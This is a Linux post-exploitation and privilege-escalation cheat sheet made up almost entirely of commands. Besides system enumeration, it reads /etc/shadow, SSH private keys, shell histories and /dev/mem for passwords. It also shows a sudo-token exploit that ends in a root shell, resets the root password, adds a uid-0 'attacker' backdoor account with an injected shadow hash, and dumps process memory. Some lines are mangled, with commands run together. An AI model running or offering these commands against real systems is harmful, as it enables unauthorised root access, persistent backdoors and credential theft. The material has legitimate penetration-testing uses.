Enumeration

cat /etc/issue
 cat /etc/*-release
 cat /etc/lsb-release 
 cat /etc/redhat-release

cat /proc/version
 uname -a 
uname -mrs
 cat /proc/$$/status | grep "[UG]id"
 rpm -q kernel 
dmesg | grep Linux 
ls /boot | grep vmlinuz-

curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '

$ sudo whatever 
[sudo] password for user: # Press+c since you don't have the password. 
# This creates an invalid sudo tokens. 
$ sh exploit.sh .... wait 1 seconds 
$ sudo -i # no password required :) 
# id
 uid=0(root) gid=0(root) groups=0(root)

cat /etc/profile 
cat /home/*/.bashrc | grep alias | grep -v "#"
cat /root/.bashrc | grep alias | grep -v "#" 
cat ~/.bash_profile
cat ~/.bashrc cat ~/.bash_logout 
env 
set

echo "root:spotless" | chpasswd

strings /dev/mem -n10 | grep -i PASS

lsmod /sbin/modinfo [lib] ls /dev 2>/dev/null | grep -i "sd" cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null `` #Check if credentials in fstab grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null

cat /etc/shells |grep "bin"|cut -d "/" -f3 2>/dev/null

progr_dev=( "which perl" "which gcc" "which g++" "which python" "which php" "which cc" "which go" "which node") ;for programming_lang in "${progr_dev[@]}"; do pss=`$programming_lang |cut -d"/" -f4` ;if [ "$pss" ]; then echo -e "$pss" ;fi done

mail && ls -alh /var/mail/

lpstat -a

lsof -i 
lsof -i :80 grep 80 /etc/services 
netstat -antup 
netstat -antpx 
netstat -tulpn chkconfig --list 
chkconfig --list | grep 3:on 
last 
w 
cat /etc/sudoers

find / -name wget 
find / -name nc* find / -name netcat* 
find / -name tftp*
 find / -name ftp

python -c ‘import pty; pty.spawn(“/bin/bash”)’/var/wwwfind /usr/bin -perm -u=s -type ffind . -exec /bin/sh \; -quit/usr/sbin/useradd -ou 0 -g 0 attackersed -i ‘s/attacker:!:/attacker:$6$uW5y3OHZDcc0avXy$WiqPpaw7e2a7K8Z.oKMUgMzCAVooT0HWNMKDBbrBnBlUXbLr1lFnboJ1UkC013gPZhVIX85IZ4RCq4\/cVqpO00:/g’ /etc/shadow

sudo -l |grep vim sudo -l |grep nmap 
sudo -l |grep vi 
sudo -l

for user in $(cat /etc/passwd | cut -f1 -d":"); do id $user; done

cat /etc/passwd |cut -f1,3,4 -d":" |grep "0:0" |cut -f1 -d":"|awk '{print $1}'

find /home/* -name *.*history* -print 2> /dev/null

cat ~/.bash_history
 cat ~/.nano_history
 cat ~/.atftp_history 
cat ~/.mysql_history 
cat ~/.php_history

cat ~/.bashrc
 cat ~/.profile 
cat /var/mail/root
 cat /var/spool/mail/root

if [ `which aa-status 2>/dev/null` ]; then
    aa-status
  elif [ `which apparmor_status 2>/dev/null` ]; then
    apparmor_status
  elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then
    ls -d /etc/apparmor*
  else
    echo "Not found AppArmor"
fi

((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity")

(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")

(grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield") SElinux
(sestatus 2>/dev/null || echo "Not found sestatus") ASLR
cat /proc/sys/kernel/randomize_va_space 2>/dev/null #If 0, not enabled

cat /etc/resolv.conf
 cat /etc/sysconfig/network 
cat /etc/networks 
iptables -L 
hostname
 dnsdomainname

ss -anp 
netstat -ano
 /sbin/ifconfig -a 
cat /etc/network/interfaces 
cat /etc/sysconfig/network 
arp -e 
route
 /sbin/route -nee

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

/etc/iptables
 iptables -L 
grep -Hs iptables /etc/*

cat /etc/hosts 2>/dev/null && cat /etc/resolv.conf 2>/dev/null && cat /etc/sysconfig/network 2>/dev/null && cat /etc/networks 2>/dev/null | uniq | srt | grep -v '#'

cat /etc/ssh/sshd_config | grep PermitRootLogin | grep -v "#"

cat ~/.ssh/identity.pub ~/.ssh/authorized_keys ~/.ssh/identity ~/.ssh/id_rsa.pub ~/.ssh/id_rsa ~/.ssh/id_dsa.pub ~/.ssh/id_dsa /etc/ssh/ssh_config /etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_rsa_key.pub /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_key.pub /etc/ssh/ssh_host_key 2>/dev/null

ps aux | awk '{print $11}' |xargs -r ls -la 2>/dev/null |awk '!x[$0]++'

#!/bin/bash #Loop by line IFS=$'\n' old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) while true; do new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] sleep 1 old_process=$new_process

ps aux ps -ef ps aux | grep "^root" top cat /etc/services

ps aux | grep root ps -ef | grep root

ls -alh /usr/bin/ 
ls -alh /sbin/ dpkg -l | grep rpm -qa | grep 
ls -alh /var/cache/apt/archives 
ls -alh /var/cache/yum/

ls -lah /etc/cron* 
cat /etc/crontab crontab -l 
ls -alh /var/spool/cron
 ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* 
cat /etc/at.allow 
cat /etc/at.deny 
cat /etc/cron.allow
 cat /etc/cron.deny 
cat /etc/crontab
 cat /etc/anacrontab 
cat /var/spool/cron/crontabs/root

 procdump() ( cat /proc/$1/maps | grep -Fv ".so" | grep " 0 " | awk '{print $1}' | ( IFS="-" while read a b; do dd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \ skip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of="$1_mem_$a.bin" done ) cat $1*.bin > $1.dump rm $1*.bin )

strings /dev/mem -n10 | grep -i PASS

which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc rkt kubectl 2>/dev/null

(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")

dpkg -l rpm -q

cat /etc/syslog.conf 
cat /etc/chttp.conf 
cat /etc/lighttpd.conf
 cat /etc/cups/cupsd.conf
 cat /etc/inetd.conf
 cat /etc/apache2/apache2.conf 
cat /etc/my.conf
 cat /etc/httpd/conf/httpd.conf 
cat /opt/lampp/etc/httpd.conf
 ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone 
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner 
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group 
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other 
find /etc/ -readable -type f 2>/dev/null # Anyone 
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone 
ls -alh /var/log ls -alh /var/mail 
ls -alh /var/spool 
ls -alh /var/spool/lpd 
ls -alh /var/lib/pgsql 
ls -alh /var/lib/mysql
 cat /var/lib/dhcp3/dhclient.leases
 ls -alhR /var/www/
 ls -alhR /srv/www/htdocs/ 
ls -alhR /usr/local/www/apache22/data/ 
ls -alhR /opt/lampp/htdocs/
 ls -alhR /var/www/html/

systemctl show-environment

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

showmount -e 192.168.1.25

find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null

find / -writable -type d 2>/dev/null

find / -perm -u=s -type f 2>/dev/null
 find / -perm -4000 -type f 2>/dev/null

find / -uid 0 –perm -4000 –type f 2>/dev/null

find / -perm -2000 -type -f 2>/dev/null

find -perm -2 -type f 2>/dev/null

ls -al /etc/*.conf grep pass* /etc/*.conf >>> containing passwords

grep pass* /etc/*.conf 
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
 find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

lsof -n

find / -mmin -10 2>/dev/null | grep -Ev "^/proc"

find / -writable -type d 2>/dev/null

cat /etc/fstab mount /bin/lsblk

find / -perm -u=s -type f 2>/dev/null

grep -i user [filename] 
grep -i pass [filename] 
grep -C 5 "password" [filename]
 find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

cat /etc/passwd 
cat /etc/group 
cat /etc/shadow 
ls -alh /var/mail/

cat ~/.ssh/authorized_keys
 cat ~/.ssh/identity.pub 
cat ~/.ssh/identity 
cat ~/.ssh/id_rsa.pub
 cat ~/.ssh/id_rsa 
cat ~/.ssh/id_dsa.pub 
cat ~/.ssh/id_dsa 
cat /etc/ssh/ssh_config
 cat /etc/ssh/sshd_config 
cat /etc/ssh/ssh_host_dsa_key.pub
 cat /etc/ssh/ssh_host_dsa_key 
cat /etc/ssh/ssh_host_rsa_key.pub 
cat /etc/ssh/ssh_host_rsa_key 
cat /etc/ssh/ssh_host_key.pub 
cat /etc/ssh/ssh_host_key

cat /etc/httpd/logs/access_log
 cat /etc/httpd/logs/access.log 
cat /etc/httpd/logs/error_log 
cat /etc/httpd/logs/error.log 
cat /var/log/apache2/access_log 
cat /var/log/apache2/access.log 
cat /var/log/apache2/error_log 
cat /var/log/apache2/error.log 
cat /var/log/apache/access_log 
cat /var/log/apache/access.log 
cat /var/log/auth.log 
cat /var/log/chttp.log